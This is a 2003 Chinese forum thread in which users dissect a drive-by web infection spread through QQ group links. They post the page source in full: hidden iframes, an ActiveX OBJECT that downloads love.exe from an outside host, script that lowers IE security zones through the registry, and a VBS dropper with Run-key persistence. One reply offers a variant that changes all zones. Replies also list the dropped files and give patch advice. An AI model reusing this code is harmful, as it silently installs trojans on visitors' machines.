分析一下这个病毒(不要轻易打开其中的网址）

griefforyou 2003-09-18 11:24:47

今天QQ群乱套了，有人发消息

http://nicex.126.com
看看啊. 我最近照的照片~ 才扫描到网上的.看看我是不是变了样?

我点了链接，不一会，我的QQ也向QQ群中发这条消息，我知道我中毒了。。。。

QQ群中很多人都中了毒。。。。。。。。。

我分析了一下，终于找到病根，请大家分析一下

网页中包含以下两行
<iframe src="1.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="2.htm" width="0" height="0" frameborder="0"></iframe>

其中1.htm内容如下
<HTML>

<HEAD>

<TITLE>aaa</TITLE>

</HEAD>

<BODY>

<OBJECT
classid="clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D" codebase="http://yy20.nease.net/zcyh/images/WebDownLoadProj1.ocx#version=1,0,0,0"
width=1 height=1 align=center
hspace=0 vspace=0>

<param name="StrUrl" value="http://yy20.nease.net/zcyh/love.exe">
</OBJECT>
<iframe src="love.mht" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
</iframe>
</BODY></HTML>

其中又包含了love.mht,这是一个编码后的邮件，其中包含一个可执行文件
Content-Type: audio/x-wav;
name="jieba.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud>

由于这个文件太大，无法在此帖出

2.htm
<SCRIPT>

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f(){

try
{

//ActiveX initialization
a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Shl = a1.GetObject();

a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

a1.createInstance();

FSO = a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();
Net = a1.GetObject();

try
{

if (document.cookie.indexOf("Chg") == -1)
{

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");

var expdate = new Date((new Date()).getTime() + (1));

document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}

catch(e)
{}
}
catch(e)
{}
}

function init()
{
setTimeout("f()", 1000);
}

init();
</SCRIPT>

<script language="javascript">



</script>

其中打开了3.htm，其内容为
<HTML>
<HEAD>
<TITLE>网易广告</TITLE>
</HEAD>
<BODY>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""

run_exe+="CODEBASE=\"love.exe#version=1,1,1,1\">"

run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"

run_exe+="</OBJECT>"

run_exe+="<HTML><H1> </H1></HTML>";

document.open();

document.clear();

document.writeln(run_exe);

document.close();
</SCRIPT>

<IMG SRC=Server.bmp width=0 height=0>

<SCRIPT SRC=Server.js></SCRIPT>

</BODY></HTML>

其中包括的Server.js内容如下
document.write('<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>');
function docsave()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh=a.GetObject();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso=a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+'\\s.vbs';
wsh.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'"');
wsh.RegWrite('HKCR\\.VBS\\','VBSFile');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine('Option Explicit');
st.WriteLine('Dim FSO,WSH,CACHE,str');
st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")');
st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache")');
st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")');
st.WriteLine('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"');
st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"Server[1].bmp"');
st.WriteLine('WScript.Quit()');
st.WriteLine('Function SearchBMPFile(Folder,fname)');
st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');
st.WriteLine(' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname');
st.WriteLine(' if FSO.FileExists(str) then');
st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
st.WriteLine(' set File=FSO.GetFile(str)');
st.WriteLine(' File.Copy(tmp & "tmp.dat")');
st.WriteLine(' File.Delete');
st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');
st.WriteLine(' Lt.WriteLine("rbx")');
st.WriteLine(' Lt.WriteLine("3")');
st.WriteLine(' Lt.WriteLine("rcx")');
st.WriteLine(' Lt.WriteLine("5492")');
st.WriteLine(' Lt.WriteLine("w136")');
st.WriteLine(' Lt.WriteLine("q")');
st.WriteLine(' Lt.Close');
st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
st.WriteLine(' On Error Resume Next ');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
st.WriteLine(' end if');
st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
st.WriteLine(' For Each SubFolder In Folder.SubFolders');
st.WriteLine(' SearchBMPFile SubFolder,fname');
st.WriteLine(' Next');
st.WriteLine(' End If');
st.WriteLine('End Function');
st.Close();
}
setTimeout('docsave()',1000);

我晕了。。。。。。。。。。。。。这病毒牛，谁能解开其中奥秘？

...全文

60 14 打赏收藏转发到动态举报

写回复

用AI写文章

14 条回复

切换为时间正序

请发表友善的回复…

发表回复

griefforyou 2003-09-19

打赏
举报

打开网页后，病毒自动将邮件中的可执行文件生成在C:\windows\temp下

并生成副本
C:\WINDOWS\intrenat.exe
C:\Windows\system\DirectX.exe
c:\windows\system\winhelp.exe
c:\windows\system\winhelp32.exe

在system.ini中[boot]项写入
shell=Explorer.exe C:\Windows\system\DirectX.exe (本应该只用Explorer.exe的)

在注册表
HKEY_Local_Machine\......\run\下写入自动运行 C:\WINDOWS\intrenat.exe和C:\WINDOWS\winhelp.exe

在注册表
HKEY_LOCAL_Machine\...\runservice\下写入自动运行 C:\WINDOWS\intrenat.exe

在win.ini中[windows]项写入
run=C:\WINDOWS\winhelp32.exe

griefforyou 2003-09-19

打赏
举报

没点同意，安全设置是默认的

griefforyou 2003-09-19

打赏
举报

是呀，这里面有病毒代码呀，不过放心，只是文本形式

wind0209 2003-09-19

打赏
举报

晕倒，我打开这个xml文件，NORTON报病毒了.......

griefforyou 2003-09-19

打赏
举报

不是吧。。。
主要问题在于 love.mht上，当love.mht在iframe中打开时，自动会将其中附件jiede.exe下载到临时目录然后运行，运行以后病毒将生成几个副本，并修改注册表和System.ini Win.ini来自动启动它们

xdspower 2003-09-19

打赏
举报

主要是利用了ms的脚本对象控制，

griefforyou 2003-09-19

打赏
举报

这个Love.mht原来是“狩猎者”病毒........
请看:http://www.duba.net/download/3/34.shtml

问题好像有点复杂。。。。。这不只是一个病毒吧?

griefforyou 2003-09-19

打赏
举报

谁能完整说一下病毒的原理

blues-star 2003-09-19

打赏
举报

修改的是

下载未签名的 ACTIVEX 控件
值0代表启用
值1代表提示
值3代表禁用

（手工修改一下，再打开注册表看看值的变化就知道了）

从上面一段可以看出它是将该项目启用了。

写这个的人真傻，要是我

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\1004",0,"REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1004",0,"REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\1004",0,"REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004",0,"REG_DWORD");

这样就把所有区域的都设成启用了，这样看拖进黑名单会有点用，因为黑名单里的网站javascript都是不允许执行的，也修改不了了。

zhzhkun 2003-09-19

打赏
举报

http://bbs.kingsoft.net/index.php?act=ST&f=20&t=235766&s=9ff50226de60b8103e8d5cfac8017db4
去这里下载专杀，我试了，可以杀死

blues-star 2003-09-19

打赏
举报

1、利用IE漏洞，修改注册表，更改IE安全设置，自动下载ACTIVEX组件启用；
2、通过<object>的codebase下载木马或病毒程序；
3、用木马或病毒程序完成制造者的意图。

给IE打补丁，不让修改安全设置就可以了，IE的安全设置是浏览者的大门，要把好门。
通常不是很强的人写出来的更改安全设置应该是IE默认的安全设置，IE的安全设置里有信任站点和不信任站点，遇到这样的网站直接啦他去黑名单就行了，不过最根本的还是要靠打补丁。

http://www.muchina.com.cn/这个网站也是用类似手段将木马种到浏览者机器里，然后窃取游戏帐号的。

（这段程序是可以修改安全设置的，所以根本不会弹出提示，直接下载ACTIVEX，不知道的人可能以为什么也没有发生呢）

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");

这句

zhzhkun 2003-09-19